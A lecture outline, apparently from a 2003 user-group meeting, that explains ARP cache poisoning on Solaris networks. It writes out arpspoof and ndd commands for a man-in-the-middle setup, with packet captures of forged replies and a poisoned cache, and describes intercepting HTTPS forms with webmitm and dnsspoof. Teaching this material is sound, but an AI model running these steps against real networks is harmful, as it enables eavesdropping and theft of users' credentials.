ARP Poison Lecture - UUSC Meeting 05.01.03 ****************************************** Facts about ARP: o ARP maps 48 bit MAC addresses to 32 bit IP addresses. o There are two expected kinds of ARP: * unicast solicited replies * broadcast requests o Per the ARP RFC, ARP will also accept: * broadcast replies * unicast requests o ARP is dynamic and has the following timers: * solicited replies - 20 minutes * unsolicited requests - 5 minutes o There is no authentication in ARP. o The latest ARP entry updates the cache. o Any host can send ARP updates on behalf of any other host. ARP Related commands The arp command ---------------------- The arp command is part of the Solaris OS. It enables a host to add a static entry (-s) to it's ARP cache and also to publish that entry to the broadcast address. Do not be mislead about static entries. They do not keep a static address mapping. All they do is keep a static address entry in the ARP table that will be updated by the last ARP update for that entry. # arp -h arp: illegal option -- h Usage: arp hostname arp -a [-n] arp -d hostname arp -s hostname ether_addr [temp] [pub] [trail] arp -f filename To add a static published entry: server2# arp -s longbeach 8:0:20:a:b:c pub The resulting packet: ETHER: ----- Ether Header ----- ETHER: ETHER: Packet 5 arrived at 13:45:33.26 ETHER: Packet size = 42 bytes ETHER: Destination = ff:ff:ff:ff:ff:ff, (broadcast) ETHER: Source = 8:0:20:ff:b3:c5, Sun <- ethernet address of server2 ETHER: Ethertype = 0806 (ARP) ETHER: ARP: ----- ARP/RARP Frame ----- ARP: ARP: Hardware type = 1 ARP: Protocol type = 0800 (IP) ARP: Length of hardware address = 6 bytes ARP: Length of protocol address = 4 bytes ARP: Opcode 1 (ARP Request) <- unsolicited ARP request ARP: Sender's hardware address = 8:0:20:a:b:c <-published address of longbeach ARP: Sender's protocol address = 12.22.215.65, longbeach ARP: Target hardware address = ? ARP: Target protocol address = 12.22.215.65, longbeach ARP: The previous ARP frame from server2 will update all hosts on the broadcast address with an ARP entry of 8:0:20:a:b:c for host longbeach. The host longbeach will discard the request as it already has it's own static ethernet address. The arpspoof command ----------------------------- The arpspoof command is part of the dsniff suite of utilities and can be downloaded from sunfreeware.com. The arpspoof command sends out a persistent ARP broadcast to keep all hosts with a poisoned entry. server2# arpspoof router1 In the previous example, arpspoof will send out a broadcast reply to the subnet (unexpected condition) telling all hosts that the ethernet address of router1 is actually server2. Every host on the network sending packets to router1 will send packets with an IP address of router1 and an ethernet address of server2 server2# arpspoof -t longbeach router1 In the previous example, arpspoof will send out a unicast reply to longbeach telling that host that router1's ethernet address is really server2's. Any packets that longbeach tries to route to router1 will actually go to server2. Transparent Routing ------------------------- To circumvent the security of a switch, an attacker can redirect traffic on the switch by sending two arpspoof commands to two hosts tricking them: server2# arpspoof -t longbeach router1 server2# arpspoof -t router1 longbeach *********************** # SAMPLE ARP POISON * *********************** # Expected ARP Entries for victim host (station2). hme0 10.100.0.254 255.255.255.255 08:00:20:ff:b3:c5 hme0 10.100.0.1 255.255.255.255 08:00:20:f5:cc:75 # Bogus ARP replies from station1 to broadcast proclaiming IP Address # of router (10.100.0.254) captured on station2 ETHER: ----- Ether Header ----- ETHER: ETHER: Packet 1 arrived at 14:04:4.29 ETHER: Packet size = 60 bytes ETHER: Destination = ff:ff:ff:ff:ff:ff, (broadcast) ETHER: Source = 8:0:20:f5:cc:75, Sun ETHER: Ethertype = 0806 (ARP) ETHER: ARP: ----- ARP/RARP Frame ----- ARP: ARP: Hardware type = 1 ARP: Protocol type = 0800 (IP) ARP: Length of hardware address = 6 bytes ARP: Length of protocol address = 4 bytes ARP: Opcode 2 (ARP Reply) ARP: Sender's hardware address = 8:0:20:f5:cc:75 ARP: Sender's protocol address = 10.100.0.254, 10.100.0.254 ARP: Target hardware address = ff:ff:ff:ff:ff:ff ARP: Target protocol address = 0.0.0.0, OLD-BROADCAST ARP: # Resulting poisoned ARP cache. hme0 10.100.0.1 255.255.255.255 08:00:20:f5:cc:75 hme0 10.100.0.2 255.255.255.255 SP 08:00:20:ff:e1:a8 hme0 10.100.0.254 255.255.255.255 08:00:20:f5:cc:75 These two arpspoof commands will cause both router1 and longbeach to be tricked into sending traffic to server2. Server2 has to turn on transparent routing: server2# ndd -set /dev/ip ip_forwarding 1 server2# ndd -set /dev/ip ip_send_redirects 0 This will cause server2 to simply "pass along" an ethernet frame to the router without sending an ICMP redirect message to the originating host. All traffic can now be captures on server2, making it a transparent router. Further implications: The dsnifff suite of utilities comes with SSL hijacking utilities (webmitm) and DNS spoofing utilities (dnsspoof). Both of these tools used in conjunction with arpspoof can force a client to send a DNS lookup to an attacking host, the attacking host can redirect the victim to another SSL enabled website. The other SSL enabled website will start two sessions. The first SSL session will connect the victim to the attacking SSL website. The second SSL session will connect the attacking SSL website to the real website. The webmitm program decodes all input forms to and from that should be encrypted via https.